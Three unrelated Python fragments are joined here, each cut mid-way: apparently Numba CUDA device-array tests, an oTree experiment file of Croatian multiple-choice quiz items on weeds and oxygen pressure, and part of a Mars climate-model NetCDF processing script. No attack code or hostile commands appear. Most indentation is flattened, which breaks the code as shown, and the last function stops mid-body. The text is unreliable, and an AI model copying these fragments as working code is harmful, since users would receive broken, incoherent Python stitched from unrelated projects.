dbroad_f.copy_to_device(broad_c)
np.testing.assert_array_equal(dbroad_c.copy_to_host(), broad_f)
np.testing.assert_array_equal(dbroad_f.copy_to_host(), broad_c)
def test_devicearray_contiguous_host_strided(self):
a_c = np.arange(10)
d = cuda.to_device(a_c)
arr = np.arange(20)[::2]
d.copy_to_device(arr)
np.testing.assert_array_equal(d.copy_to_host(), arr)
def test_devicearray_contiguous_device_strided(self):
d = cuda.to_device(np.arange(20))
arr = np.arange(20)
with self.assertRaises(ValueError) as e:
d.copy_to_device(cuda.to_device(arr)[::2])
self.assertEqual(
devicearray.errmsg_contiguous_buffer,
str(e.exception))
@skip_on_cudasim('Typing not done in the simulator')
def test_devicearray_typing_order_simple_c(self):
# C-order 1D array
a = np.zeros(10, order='C')
d = cuda.to_device(a)
self.assertEqual(d._numba_type_.layout, 'C')
@skip_on_cudasim('Typing not done in the simulator')
def test_devicearray_typing_order_simple_f(self):
# F-order array that is also C layout.
a = np.zeros(10, order='F')
d = cuda.to_device(a)
self.assertEqual(d._numba_type_.layout, 'C')
@skip_on_cudasim('Typing not done in the simulator')
def test_devicearray_typing_order_2d_c(self):
# C-order 2D array
a = np.zeros((2, 10), order='C')
d = cuda.to_device(a)
self.assertEqual(d._numba_type_.layout, 'C')
@skip_on_cudasim('Typing not done in the simulator')
def test_devicearray_typing_order_2d_f(self):
# F-order array that can only be F layout
a = np.zeros((2, 10), order='F')
d = cuda.to_device(a)
self.assertEqual(d._numba_type_.layout, 'F')
@skip_on_cudasim('Typing not done in the simulator')
def test_devicearray_typing_order_noncontig_slice_c(self):
# Non-contiguous slice of C-order array
a = np.zeros((5, 5), order='C')
d = cuda.to_device(a)[:,2]
self.assertEqual(d._numba_type_.layout, 'A')
@skip_on_cudasim('Typing not done in the simulator')
def test_devicearray_typing_order_noncontig_slice_f(self):
# Non-contiguous slice of F-order array
a = np.zeros((5, 5), order='F')
d = cuda.to_device(a)[2,:]
self.assertEqual(d._numba_type_.layout, 'A')
@skip_on_cudasim('Typing not done in the simulator')
def test_devicearray_typing_order_contig_slice_c(self):
# Contiguous slice of C-order array
a = np.zeros((5, 5), order='C')
d = cuda.to_device(a)[2,:]
self.assertEqual(d._numba_type_.layout, 'C')
@skip_on_cudasim('Typing not done in the simulator')
def test_devicearray_typing_order_contig_slice_f(self):
# Contiguous slice of F-order array - is both C- and F-contiguous, so
# types as 'C' layout
a = np.zeros((5, 5), order='F')
d = cuda.to_device(a)[:,2]
self.assertEqual(d._numba_type_.layout, 'C')
@skip_on_cudasim('Typing not done in the simulator')
def test_devicearray_typing_order_broadcasted(self):
# Broadcasted array, similar to that used for passing scalars to ufuncs
a = np.broadcast_to(np.array([1]), (10,))
d = cuda.to_device(a)
self.assertEqual(d._numba_type_.layout, 'A')
class TestRecarray(CUDATestCase):
def test_recarray(self):
# From issue #4111
a = np.recarray((16,), dtype=[
("value1", np.int64),
("value2", np.float64),
])
a.value1 = np.arange(a.size, dtype=np.int64)
a.value2 = np.arange(a.size, dtype=np.float64) / 100
expect1 = a.value1
expect2 = a.value2
def test(x, out1, out2):
i = cuda.grid(1)
if i < x.size:
out1[i] = x.value1[i]
out2[i] = x.value2[i]
got1 = np.zeros_like(expect1)
got2 = np.zeros_like(expect2)
cuda.jit(test)[1, a.size](a, got1, got2)
np.testing.assert_array_equal(expect1, got1)
np.testing.assert_array_equal(expect2, got2)
class TestCoreContiguous(CUDATestCase):
def _test_against_array_core(self, view):
self.assertEqual(
devicearray.is_contiguous(view),
devicearray.array_core(view).flags['C_CONTIGUOUS']
)
def test_device_array_like_1d(self):
d_a = cuda.device_array(10, order='C')
self._test_against_array_core(d_a)
def test_device_array_like_2d(self):
d_a = cuda.device_array((10, 12), order='C')
self._test_against_array_core(d_a)
def test_device_array_like_2d_transpose(self):
d_a = cuda.device_array((10, 12), order='C')
self._test_against_array_core(d_a.T)
def test_device_array_like_3d(self):
d_a = cuda.device_array((10, 12, 14), order='C')
self._test_against_array_core(d_a)
def test_device_array_like_1d_f(self):
d_a = cuda.device_array(10, order='F')
self._test_against_array_core(d_a)
def test_device_array_like_2d_f(self):
d_a = cuda.device_array((10, 12), order='F')
self._test_against_array_core(d_a)
def test_device_array_like_2d_f_transpose(self):
d_a = cuda.device_array((10, 12), order='F')
self._test_against_array_core(d_a.T)
def test_device_array_like_3d_f(self):
d_a = cuda.device_array((10, 12, 14), order='F')
self._test_against_array_core(d_a)
def test_1d_view(self):
shape = 10
view = np.zeros(shape)[::2]
self._test_against_array_core(view)
def test_1d_view_f(self):
shape = 10
view = np.zeros(shape, order='F')[::2]
self._test_against_array_core(view)
def test_2d_view(self):
        shape = (10, 12)
        view = np.zeros(shape)[::2, ::2]
        self._test_against_array_core(view)
# scripts/exp-application/fwt_oTree/fwt/models.py
from otree.api import (
models, widgets, BaseConstants, BaseSubsession, BaseGroup, BasePlayer
)
author = '<NAME>'
doc = """
This app is designed to investigate the forward testing effect
"""
class Constants(BaseConstants):
name_in_url = 'fwt'
players_per_group = None
num_rounds = 1
class Subsession(BaseSubsession):
pass
class Group(BaseGroup):
pass
# Questions are added by passing "label" as the first argument to models.IntegerField!
class Player(BasePlayer):
identity = models.StringField(label = 'prva dva slova imena oca, zadnja dva slova imena majke, i zadnja dva broja mobitela:')
def feedback(self, form_fields):
if form_fields == 2:
print('Točno')
else:
print('Netočno')
# practice questions
practice_q1 = models.IntegerField(label = 'Tlak kisika uvijek iznosi manje od:',
choices = [
[1, '10% ukupnog atmosferskog tlaka'],
[2, '21% ukupnog atmosferskog tlaka'],
[3, '73% ukupnog atmosferskog tlaka'],
[4, '87% ukupnog atmosferskog tlaka']],
widget = widgets.RadioSelect)
practice_q2 = models.IntegerField(label = """Ovisno o promjeni nadmorske visine,
odnos veličine parcijalnog tlaka kisika u atmosferi i veličine parcijalnog tlaka
kisika u alveolama pluća je:""",
choices = [
[1, 'proporcionalan'],
[2, 'eksponencijalan'],
[3, 'konstantan'],
[4, 'neproporcionalan']],
widget = widgets.RadioSelect)
practice_q3 = models.IntegerField(label = """Smanjenje parcijalnog tlaka kisika
u zraku može biti posljedica:""",
choices = [
[1, 'povećanja proporcije vodene pare'],
[2, 'povećanja nadmorske visine'],
[3, 'pojačane respiracijske aktivnosti'],
[4, 'smanjenja proporcije vodene pare']],
widget = widgets.RadioSelect)
practice_q4 = models.IntegerField(label = """S porastom nadmorske visine, izmjena
ugljikovog dioksida između alveola i plućnih kapilara je:""",
choices = [
[1, 'povećana'],
[2, 'smanjena'],
[3, 'konstantna'],
[4, 'razmjerna količini vodene pare u alveolama']],
widget = widgets.RadioSelect)
# test1 content questions
test1_q1 = models.IntegerField(label = 'Koliko se drvenastih i zeljastih biljaka smatra korovima (zaokružite najbližu vrijednost)?',
choices = [
[1, 'više od 2500'],
[2, 'više od 3000'],
[3, 'više od 3500'],
[4, 'više od 4000']],
widget = widgets.RadioSelect)
test1_q2 = models.IntegerField(label = 'Na urbanim prostorima se pojavljuju korovima srodne:',
choices = [
[1, 'rudimentarne biljke'],
[2, 'runalne biljke'],
[3, 'repaste biljke'],
[4, 'ruderalne biljke']],
widget = widgets.RadioSelect)
test1_q3 = models.IntegerField(label = 'Za korove je karakteristično da imaju:',
choices = [
[1, 'učinkovit korijenski, ali ne i nadzemni sustav'],
[2, 'učinkovit nadzemni sustav, ali ne i korijenski'],
[3, 'učinkovit korijenski i nadzemni sustav'],
[4, 'neučinkovit i korijenski i nadzemni sustav']],
widget = widgets.RadioSelect)
test1_q4 = models.IntegerField(label = 'Hoće li se biljka nazvati korovom ili ne, ovisi o:',
choices = [
[1, 'stupnju u kojem crpi resurse od kulturne biljke'],
[2, 'njenoj rasprostranjenosti na nekom području'],
[3, 'tome je li biljka cilj uzgoja'],
[4, 'njenom potencijalu za proliferaciju']],
widget = widgets.RadioSelect)
test1_q5 = models.IntegerField(label = 'Korovi uglavnom pripadaju u skupinu:',
choices = [
[1, 'autotrofnih biljaka'],
[2, 'semitrofnih biljaka'],
[3, 'heterotrofnih biljaka'],
[4, 'autosomnih biljaka']],
widget = widgets.RadioSelect)
test1_q6 = models.IntegerField(label = 'Dio okoliša koji su ljudi prilagodili za poljoprivrednu proizvodnju naziva se:',
choices = [
[1, 'agrocenoza'],
[2, 'agrodom'],
[3, 'agrosfera'],
[4, 'agrotop']],
widget = widgets.RadioSelect)
test1_q7 = models.IntegerField(label = 'Talofite su:',
choices = [
[1, 'parazitske biljke'],
[2, 'gljive'],
[3, 'alge'],
[4, 'drvenaste biljke']],
widget = widgets.RadioSelect)
test1_q8 = models.IntegerField(label = 'Korovi mogu biti korisni u:',
choices = [
[1, 'proizvodnji umjetnih gnojiva'],
                                          [2, 'proizvodnji celuloznih vlakana'],
[3, 'proizvodnji antihistaminika'],
[4, 'proizvodnji prirodnih boja']],
widget = widgets.RadioSelect)
test1_q9 = models.IntegerField(label = 'Agrofitocenoze su:',
choices = [
[1, 'biljne zajednice korova i kulturnih biljaka'],
[2, 'zajednice kulturnih biljaka i sisavaca koji nastanjuju poljoprivredne površine'],
[3, 'zajednice raznovrsnih kulturnih biljaka'],
[4, 'zajednice raznovrsnih korova na poljoprivrednim površinama']],
widget = widgets.RadioSelect)
test1_q10 = models.IntegerField(label = 'Koja od navedenih biljaka je istovremeno i korov i kulturna biljka?',
choices = [
[1, '<NAME>'],
[2, '<NAME>'],
[3, 'cikorija'],
[4, 'ječam']],
widget = widgets.RadioSelect)
# test2 content questions
test2_q1 = models.IntegerField(label = 'Dio okoliša koji su ljudi naselili i prilagodili sebi naziva se:',
choices = [
[1, 'antropofitocenoza'],
[2, 'antroposfera'],
[3, 'agrosfera'],
[4, 'antrotop']],
widget = widgets.RadioSelect)
test2_q2 = models.IntegerField(label = 'Podzemni dio stabiljke zove se:',
choices = [
[1, 'rudela'],
[2, 'gomolj'],
[3, 'korijen'],
[4, 'rizom']],
widget = widgets.RadioSelect)
test2_q3 = models.IntegerField(label = 'U odnosu na mlađe korovske biljke, starije korovske biljke:',
choices = [
[1, 'imaju jači alelopatijski učinak'],
[2, 'sadrže više fitotoksina'],
[3, 'sadrže manje inhibitornih tvari'],
[4, 'pokazuju veću plastičnost']],
widget = widgets.RadioSelect)
test2_q4 = models.IntegerField(label = 'Suncokret nepovoljno djeluje na rast:',
choices = [
[1, 'ambrozije'],
[2, 'cikorije'],
[3, 'koštana'],
[4, 'pirike']],
widget = widgets.RadioSelect)
test2_q5 = models.IntegerField(label = 'Pojava korova vezana je uz stvaranje:',
choices = [
[1, 'agrosfere i agrofitocenoze'],
[2, 'antroposfere i astenosfere'],
[3, 'ekosfere i fitocenoze'],
[4, 'antroposfere i agrosfere']],
widget = widgets.RadioSelect)
test2_q6 = models.IntegerField(label = 'Na poljoprivrednim zemljištima, biljni sastav korova mijenja se:',
choices = [
[1, 'ovisno o sustavu godišnje izmjene usjeva i obradi tla'],
[2, 'ovisno o obradi tla i kolebanju ekoloških čimbenika'],
[3, 'ovisno o njegovom potencijalu za proliferaciju'],
[4, 'neovisno o poljoprivrednim zahvatima']],
widget = widgets.RadioSelect)
test2_q7 = models.IntegerField(label = 'Utjecaj koji jedna vrsta ima na rast i razvitak druge vrste naziva se:',
choices = [
[1, 'anuliranje'],
[2, 'alelopatija'],
[3, 'fitopatija'],
[4, 'anualnost']],
widget = widgets.RadioSelect)
test2_q8 = models.IntegerField(label = 'Korovi su se na poljoprivrednim površinama pojavili',
choices = [
[1, 'u mlađe kameno doba, pri stvaranju prvih agrofitocenoza'],
[2, 'u starije kameno doba, pri stvaranju antroposfere'],
[3, 'u mlađe kameno doba, pri stvaranju agrosfere'],
[4, 'u starije kameno doba, pri stvaranju prvih fitocenoza']],
widget = widgets.RadioSelect)
test2_q9 = models.IntegerField(label = 'Plodored se odnosi na:',
choices = [
[1, 'sustav godišnje izmjene usjeva'],
[2, 'način gnojenja kultura u svrhu restrikcije rasta i razvoja korova'],
[3, 'uzgoj biljaka pri kojem je karakteristično okopavanje'],
[4, 'broj jedinki zasađenih u jednom redu']],
widget = widgets.RadioSelect)
test2_q10 = models.IntegerField(label = 'Koji korov može pozitivno djelovati na raž?',
choices = [
[1, 'troskot'],
[2, 'trputac'],
[3, 'poljska ljubica'],
[4, 'slakoperka']],
widget = widgets.RadioSelect)
# test3 content questions
test3_q1 = models.IntegerField(label = 'Veća otpornost prema nepovoljnim biotskim čimbenicima odnosi se prvenstveno na otpornost prema:',
choices = [
[1, 'inhibitornim tvarima'],
[2, 'parazitskim biljkama'],
[3, 'virusima i bakterijama'],
[4, 'bolestima i štetnicima']],
widget = widgets.RadioSelect)
test3_q2 = models.IntegerField(label = 'Poljoprivredno stanište u kojem raste neka biljka zove se:',
choices = [
[1, 'agrobiosfera'],
[2, 'agrosfera'],
[3, 'biotop'],
[4, 'agrobiotop']],
widget = widgets.RadioSelect)
test3_q3 = models.IntegerField(label = 'Neki korovi biološku reprodukciju u nepovoljnim uvjetima osiguravaju putem:',
choices = [
[1, 'neotenije'],
[2, 'alelopatije'],
[3, 'diploidije'],
[4, 'domestikacije']],
widget = widgets.RadioSelect)
test3_q4 = models.IntegerField(label = 'Veći stupanj domestikacije korova dovodi do:',
choices = [
[1, 'smanjenja alelopatijskog djelovanja'],
[2, 'bržeg širenja sjemenja'],
[3, 'promjene ploidije korova'],
[4, 'smanjenja dormantnosti']],
widget = widgets.RadioSelect)
test3_q5 = models.IntegerField(label = 'Veći, bujniji i varijabilniji korovi imaju karakteristiku:',
choices = [
[1, 'poliploidije'],
[2, 'neotenije'],
[3, 'dormantnosti'],
[4, 'fertilizacije']],
widget = widgets.RadioSelect)
test3_q6 = models.IntegerField(label = 'Neotenija korova za posljedicu ima:',
choices = [
[1, 'povećanu plastičnost'],
[2, 'brzo sazrijevanje'],
[3, 'prilagodbu kulturnim biljkama'],
[4, 'stvaranje velikog broja sjemenki']],
widget = widgets.RadioSelect)
test3_q7 = models.IntegerField(label = 'Velika otpornost sjemenki korova na štetne eksterne utjecjaje proizlazi iz:',
choices = [
[1, 'malih dimenzija sjemena'],
[2, 'male mase sjemena'],
[3, 'čvrste sjemene ljuske'],
[4, 'kalijpozitivnosti sjemena']],
widget = widgets.RadioSelect)
test3_q8 = models.IntegerField(label = 'Pojam poliploidija se odnosi na:',
choices = [
[1, 'broj setova kromosoma'],
[2, 'broj zigotnih stanica'],
[3, 'broj alelopatijskih odnosa'],
[4, 'broj izdanaka koji tvore stabljiku']],
widget = widgets.RadioSelect)
test3_q9 = models.IntegerField(label = 'Veću otpornost prema ekstremnim abiotskim utjecajima korovi mogu zahvaliti:',
choices = [
[1, 'svom florističkom sastavu'],
[2, 'pretežnoj diploidnosti i bujnosti'],
[3, 'strukturi korijena i razgranatosti stabljike'],
[4, 'većoj vitalnosti i većoj heterozigotnosti']],
widget = widgets.RadioSelect)
test3_q10 = models.IntegerField(label = 'Dormantnost je karakteristika korova koja se odnosi na:',
choices = [
[1, 'mogućnost odgođenog klijanja'],
[2, 'prilagodbu kulturnim biljkama'],
[3, 'širenje sjemena isključivo u proljeće'],
[4, 'klijanje usko vezano uz rast druge biljke']],
widget = widgets.RadioSelect)
# question_id = models.IntegerField()
# question = models.StringField()
# solution = models.StringField()
# submitted_answer = models.StringField(widget=widgets.RadioSelect)
# is_correct = models.BooleanField()
#
# def current_question(self):
# return self.session.vars['questions'][self.round_number - 1]
#
# def check_correct(self):
# self.is_correct = (self.submitted_answer == self.solution)
        fullnameOUT = fullnameIN[:-3]+out_ext+'.nc'
        #Append extension, if any:
if parser.parse_args().ext:fullnameOUT=fullnameOUT[:-3]+'_'+parser.parse_args().ext+'.nc'
fdiurn = Dataset(fullnameIN, 'r', format='NETCDF4_CLASSIC')
var_list = filter_vars(fdiurn,parser.parse_args().include) # get all variables
#find time of day variable name
tod_name=find_tod_in_diurn(fdiurn)
tod_in=fdiurn.variables[tod_name][:]
lon=fdiurn.variables['lon'][:]
areo=fdiurn.variables['areo'][:]
fnew = Ncdf(fullnameOUT) # define a Ncdf object from the Ncdf wrapper module
#Copy all dims but time of day from the old file to the new file
    #Harmonics to reconstruct the signal; we will use the original time_of_day array.
if parser.parse_args().reconstruct:
fnew.copy_all_dims_from_Ncfile(fdiurn)
#Copy time_of_day axis from initial files
fnew.copy_Ncaxis_with_content(fdiurn.variables[tod_name])
else:
fnew.copy_all_dims_from_Ncfile(fdiurn,exclude_dim=[tod_name])
# Create new dimension holding the harmonics. We will reuse the 'time_of_day' name to facilitate
    # compatibility with other routines, but keep in mind this is the harmonic number
fnew.add_dim_with_content('time_of_day_%i'%(N),np.arange(1,N+1),longname_txt="tidal harmonics",units_txt="Diurnal harmonic number",cart_txt='N')
#Loop over all variables in file
for ivar in var_list:
varNcf = fdiurn.variables[ivar]
varIN=varNcf[:]
var_unit=varNcf.units
if tod_name in varNcf.dimensions and ivar not in [tod_name,'areo'] and len(varNcf.shape)>2 :
prCyan("Processing: %s ..."%(ivar))
# Normalize the data
if parser.parse_args().normalize:
norm=np.mean(varIN,axis=1)[:,np.newaxis,...] #normalize and reshape array along the time_of_day dimension
varIN=100*(varIN-norm)/norm
var_unit='% of diurnal mean'
amp,phas=diurn_extract(varIN.swapaxes(0,1),N,tod_in,lon)
if parser.parse_args().reconstruct:
VARN=reconstruct_diurn(amp,phas,tod_in,lon,sumList=[])
for nn in range(N):
fnew.log_variable("%s_N%i"%(ivar,nn+1),VARN[nn,...].swapaxes(0,1),varNcf.dimensions,"harmonic N=%i for %s"%(nn+1,varNcf.long_name),var_unit)
else:
#Update the dimensions
new_dim=list(varNcf.dimensions)
new_dim[1]='time_of_day_%i'%(N)
fnew.log_variable("%s_amp"%(ivar),amp.swapaxes(0,1),new_dim,"tidal amplitude for %s"%(varNcf.long_name),var_unit)
fnew.log_variable("%s_phas"%(ivar),phas.swapaxes(0,1),new_dim,"tidal phase for %s"%(varNcf.long_name),'hr')
elif ivar in ['pfull', 'lat', 'lon','phalf','pk','bk','pstd','zstd','zagl','time']:
prCyan("Copying axis: %s..."%(ivar))
fnew.copy_Ncaxis_with_content(fdiurn.variables[ivar])
elif ivar in ['areo']:
if parser.parse_args().reconstruct:
#time_of_day is the same size as the original file
prCyan("Copying axis: %s..."%(ivar))
fnew.copy_Ncvar(fdiurn.variables['areo'])
else:
prCyan("Processing: %s ..."%(ivar))
#Create areo variable reflecting the new shape
areo_new=np.zeros((areo.shape[0],N,1))
#Copy areo
for xx in range(N):areo_new[:,xx,:]=areo[:,0,:]
#Update the dimensions
new_dim=list(varNcf.dimensions)
new_dim[1]='time_of_day_%i'%(N)
fnew.log_variable(ivar,areo_new,new_dim,varNcf.long_name,varNcf.units)
fnew.close()
#===========================================================================
#======================== Regrid files ===================================
#===========================================================================
elif parser.parse_args().regrid_source:
out_ext='_regrid'
name_target=parser.parse_args().regrid_source[0]
#Add path unless full path is provided
if not ('/' in name_target):name_target= path2data + '/' + name_target
fNcdf_t=Dataset(name_target,'r')
for filei in file_list:
#Add path unless full path is provided
if not ('/' in filei):
fullnameIN = path2data + '/' + filei
else:
fullnameIN=filei
fullnameOUT = fullnameIN[:-3]+out_ext+'.nc'
#Append extension, in any:
if parser.parse_args().ext:fullnameOUT=fullnameOUT[:-3]+'_'+parser.parse_args().ext+'.nc'
f_in = Dataset(fullnameIN, 'r', format='NETCDF4_CLASSIC')
var_list = filter_vars(f_in,parser.parse_args().include) # get all variables
fnew = Ncdf(fullnameOUT) # define a Ncdf object from the Ncdf wrapper module
#Copy all dims from the target file to the new file
fnew.copy_all_dims_from_Ncfile(fNcdf_t)
#Loop over all variables in file
for ivar in var_list:
varNcf = f_in.variables[ivar]
if ivar in ['pfull', 'lat', 'lon','phalf','pk','bk','pstd','zstd','zagl','time','areo']:
prCyan("Copying axis: %s..."%(ivar))
fnew.copy_Ncaxis_with_content(fNcdf_t.variables[ivar])
elif varNcf.dimensions[-2:]==('lat', 'lon'): #Ignore variables like 'time_bounds', 'scalar_axis' or 'grid_xt_bnds'...
prCyan("Regridding: %s..."%(ivar))
var_OUT=regrid_Ncfile(varNcf,f_in,fNcdf_t)
fnew.log_variable(ivar,var_OUT,varNcf.dimensions,varNcf.long_name,varNcf.units)
fnew.close()
fNcdf_t.close()
    f_in.close()
else:
prRed("""Error: no action requested: use 'MarsFiles *nc --fv3 --combine, --tshift, --bin_average, --bin_diurn etc ...'""")
#END of script
#*******************************************************************************
#*************Definitions for functions used in this script ********************
#*******************************************************************************
def make_FV3_files(fpath,typelistfv3,renameFV3=True,cwd=None):
'''
Make FV3-type atmos_average,atmos_daily,atmos_diurn
Args:
fpath : full path to Legacy .nc files
typelistfv3: e.g['average', 'daily', 'diurn']
        renameFV3 : rename files from Legacy_Lsxxx_Lsyyy.nc to XXXXX.atmos_average.nc following FV3's convention
cwd : output path
Returns:
atmos_average,atmos_daily,atmos_diurn
'''
histname = os.path.basename(fpath)
if cwd is None:
histdir = os.path.dirname(fpath)
else:
histdir = cwd
histfile = Dataset(fpath,'r',format='NETCDF4_CLASSIC')
histvars = histfile.variables.keys()
histdims = histfile.dimensions.keys()
#Convert the first Ls in file to a sol number
if renameFV3:fdate= '%05i'%(ls2sol_1year(histfile.variables['ls'][0]))
def proccess_file(newf,typefv3):
for dname in histdims:
if dname == 'nlon':
var=histfile.variables['longitude']
npvar=var[:]
newf.add_dim_with_content('lon',npvar,'longitude',getattr(var,'units'),'X')
elif dname == 'nlat':
var=histfile.variables['latitude']
npvar=var[:]
newf.add_dim_with_content('lat',npvar,'latitude',getattr(var,'units'),'Y')
elif dname == 'time':
newf.add_dimension('time',None)
elif dname == 'ntod' and typefv3=='diurn':
dim=histfile.dimensions[dname]
newf.add_dimension('time_of_day_16',dim.size)
elif dname == 'nlay':
nlay=histfile.dimensions[dname]
num =nlay.size
nump=num+1
pref=7.01*100 # in Pa
pk=np.zeros(nump)
bk=np.zeros(nump)
pfull=np.zeros(num)
phalf=np.zeros(nump)
sgm =histfile.variables['sgm']
pk[0]=0.08/2 #[AK] changed pk[0]=.08 to pk[0]=.08/2, otherwise phalf[0] would be greater than phalf[1]
#*** NOTE that pk in amesGCM/mars_data/Legacy.fixed.nc was also updated***
for z in range(num):
bk[z+1] = sgm[2*z+2]
phalf[:]=pk[:]+pref*bk[:] # output in Pa
# DEPRECIATED: pfull[:] = (phalf[1:]-phalf[:num])/(np.log(phalf[1:])-np.log(phalf[:num]))
#First layer
if pk[0]==0 and bk[0]==0:
pfull[0]=0.5*(phalf[0]+phalf[1])
else:
pfull[0]=(phalf[1]-phalf[0])/(np.log(phalf[1])-np.log(phalf[0]))
#Rest of layers:
pfull[1:] = (phalf[2:]-phalf[1:-1])/(np.log(phalf[2:])-np.log(phalf[1:-1]))
newf.add_dim_with_content('pfull',pfull,'ref full pressure level','Pa')
newf.add_dim_with_content('phalf',phalf,'ref half pressure level','Pa')
newf.log_axis1D('pk',pk,('phalf'),longname_txt='pressure part of the hybrid coordinate',units_txt='Pa',cart_txt='')
newf.log_axis1D('bk',bk,('phalf'),longname_txt='sigma part of the hybrid coordinate',units_txt='Pa',cart_txt='')
else:
dim=histfile.dimensions[dname]
newf.add_dimension(dname,dim.size)
#===========END function========
if 'average' in typelistfv3:
newfname_avg = fdate+'.atmos_average.nc' #5 sol averages over tod and time
newfpath_avg = os.path.join(histdir,newfname_avg)
newfavg = Ncdf(newfpath_avg)
proccess_file(newfavg,'average')
do_avg_vars(histfile,newfavg,True,True)
newfavg.close()
if 'daily' in typelistfv3:
newfname_daily = fdate+'.atmos_daily.nc' #daily snapshot output...this is exactly the current output?
newfpath_daily = os.path.join(histdir,newfname_daily)
newfdaily = Ncdf(newfpath_daily)
proccess_file(newfdaily,'daily')
do_avg_vars(histfile,newfdaily,False,False)
newfdaily.close()
if 'diurn' in typelistfv3:
newfname_diurn = fdate+'.atmos_diurn.nc' #5 sol averages over time only
newfpath_diurn = os.path.join(histdir,newfname_diurn)
newfdiurn = Ncdf(newfpath_diurn)
proccess_file(newfdiurn,'diurn')
do_avg_vars(histfile,newfdiurn,True,False)
newfdiurn.close()
if 'fixed' in typelistfv3:
#Copy Legacy.fixed to current directory
cmd_txt='cp '+sys.prefix+'/mars_data/Legacy.fixed.nc '+fdate+'.fixed.nc'
p = subprocess.run(cmd_txt, universal_newlines=True, shell=True)
print(cwd+'/'+fdate+'.fixed.nc was copied locally')
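# Illustrative call (the input path below is made up):
#
#     make_FV3_files('/path/to/LegacyGCM_Ls000_Ls004.nc',
#                    ['average', 'daily', 'diurn', 'fixed'],
#                    renameFV3=True, cwd=os.getcwd())
#
# would write XXXXX.atmos_average.nc, XXXXX.atmos_daily.nc and
# XXXXX.atmos_diurn.nc, and copy XXXXX.fixed.nc, with XXXXX the sol number
# derived from the first Ls in the Legacy file.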
#Function to perform time averages over all fields
def do_avg_vars(histfile,newf,avgtime,avgtod,Nday=5):
histvars = histfile.variables.keys()
for vname in histvars:
var = histfile.variables[vname]
npvar = var[:]
dims = var.dimensions
ndims = npvar.ndim
vshape= npvar.shape
ntod = histfile.dimensions['ntod']
longname_txt=getattr(histfile.variables[vname],'long_name','')
        #On some files like the LegacyGCM_Ls*** on the NAS dataportal, the attribute 'long_name' may be misspelled 'longname'
if longname_txt=='':longname_txt=getattr(histfile.variables[vname],'longname','')
units_txt=getattr(histfile.variables[vname],'units','')
if avgtod:
newdims = replace_dims(dims,True)
elif avgtime:
newdims = replace_dims(dims,False)
else:
newdims = replace_dims(dims,True)
if 'time' in dims:
tind = dims.index('time')
tind_new= newdims.index('time')
numt = histfile.dimensions['time'].size
#TODO fix time !!
#now do various time averaging and write to files
if ndims == 1:
if vname == 'ls':
#first check if spans new year
if not np.all(npvar[1:] >= npvar[:-1]):
year = 0.
for x in range(1,npvar.size):
if 350. < npvar[x-1] < 360. and npvar[x] < 10.:
year += 1.
npvar[x] += 360.*year
#Create a time array
time0=ls2sol_1year(npvar[0])+np.linspace(0,10.,len(npvar))
if avgtime:
varnew = np.mean(npvar.reshape(-1,Nday),axis=1)
time0 = np.mean(time0.reshape(-1,Nday),axis=1)
if not avgtime and not avgtod: #i.e daily file
# Solar longitude
ls_start = npvar[0]
ls_end = npvar[-1]
step = (ls_end-ls_start)/np.float32(((numt-1)*ntod.size))
varnew = np.arange(0,numt*ntod.size,dtype=np.float32)
varnew[:] = varnew[:]*step+ls_start
#Time
step = (ls2sol_1year(ls_end)-ls2sol_1year(ls_start))/np.float32((numt*ntod.size))
time0 = np.arange(0,numt*ntod.size,dtype=np.float32)
time0[:] = time0[:]*step+ls2sol_1year(ls_start)
newf.log_axis1D('areo',varnew,dims,longname_txt='solar longitude',units_txt='degree',cart_txt='T')
newf.log_axis1D('time',time0,dims,longname_txt='sol number',units_txt='days since 0000-00-00 00:00:00',cart_txt='T')#added AK
else:
continue
elif ndims == 4:
varnew = npvar
if avgtime:
varnew = np.mean(npvar.reshape(-1,Nday,vshape[1],vshape[2],vshape[3]),axis=1)
if avgtod:
varnew = varnew.mean(axis=1)
if not avgtime and not avgtod:
varnew = npvar.reshape(-1,vshape[2],vshape[3])
#Rename variable
vname2,longname_txt2,units_txt2=change_vname_longname_unit(vname,longname_txt,units_txt)
#AK convert surface pressure from mbar to Pa
if vname2=='ps':varnew*=100.
newf.log_variable(vname2,varnew,newdims,longname_txt2,units_txt2)
elif ndims == 5:
varnew = npvar
if avgtime:
varnew = np.mean(npvar.reshape(-1,Nday,vshape[1],vshape[2],vshape[3],vshape[4]),axis=1)
if avgtod:
varnew = varnew.mean(axis=1)
if not avgtime and not avgtod:
varnew = npvar.reshape(-1,vshape[2],vshape[3],vshape[4])
#Rename variables
vname2,longname_txt2,units_txt2=change_vname_longname_unit(vname,longname_txt,units_txt)
newf.log_variable(vname2,varnew,newdims,longname_txt2,units_txt2)
elif vname == 'tloc':
if avgtime and not avgtod:
vname2='time_of_day_16'
longname_txt2='time of day'
units_txt2='hours since 0000-00-00 00:00:00'
# Overwrite tod from ('time_of_day_16', 'lon') to time_of_day_16
newdims=('time_of_day_16')
npvar=np.arange(0.75,24,1.5) # every 1.5 hours, centered at half timestep ? AK
newf.log_variable(vname2,npvar,newdims,longname_txt2,units_txt2)
return 0
def change_vname_longname_unit(vname,longname_txt,units_txt):
'''
Update variables names, longname and units. This was designed specifically for LegacyCGM.nc files.
'''
if vname == 'psurf':
vname = 'ps'
longname_txt='surface pressure'
units_txt='Pa'
elif vname == 'tsurf':
vname = 'ts'
longname_txt='surface temperature'
units_txt='K'
elif vname=='dst_core_mass':
vname = 'cor_mass'
longname_txt='dust core mass for the water ice aerosol'
units_txt='kg/kg'
elif vname=='h2o_vap_mass':
vname = 'vap_mass'
longname_txt='water vapor mixing ratio'
units_txt='kg/kg'
elif vname=='h2o_ice_mass':
vname = 'ice_mass'
longname_txt='water ice aerosol mass mixing ratio'
units_txt='kg/kg'
elif vname=='dst_mass':
vname = 'dst_mass'
longname_txt='dust aerosol mass mixing ratio'
units_txt='kg/kg'
elif vname=='dst_numb':
vname = 'dst_num'
longname_txt='dust aerosol number'
units_txt='number/kg'
elif vname=='h2o_ice_numb':
vname = 'ice_num'
longname_txt='water ice aerosol number'
units_txt='number/kg'
elif vname=='temp':
longname_txt='temperature'
units_txt='K'
elif vname=='ucomp':
longname_txt='zonal wind'
units_txt='m/s'
elif vname=='vcomp':
longname_txt='meridional wind'
units_txt='m/s'
else:
#Return original values
pass
return vname,longname_txt,units_txt
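# Example of the renaming performed above (taken directly from the mapping):
#
#     change_vname_longname_unit('psurf', '', '')
#     # -> ('ps', 'surface pressure', 'Pa')
#
# Variables that are not listed keep their original name, long name and units.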
def replace_dims(dims,todflag):
'''
Function to replace dimensions with fv3 names and remove tod.
This was designed specifically for LegacyCGM.nc files.
'''
newdims = dims
if 'nlat' in dims:
